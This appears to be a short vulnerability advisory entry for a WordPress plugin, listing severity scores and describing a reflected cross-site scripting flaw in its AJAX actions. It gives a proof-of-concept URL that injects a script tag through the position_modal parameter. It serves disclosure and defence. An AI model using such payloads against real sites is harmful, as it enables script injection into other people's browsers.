6.7 Medium
AI Score
Confidence
High
0.0004 Low
EPSS
Percentile
9.1%
Description The plugin does not properly escape user-controlled input when it is reflected in some of its AJAX actions.
https://www.example.com/wp-admin/admin-ajax.php?action=current_modal&position_modal=<script>alert(document.domain)</script>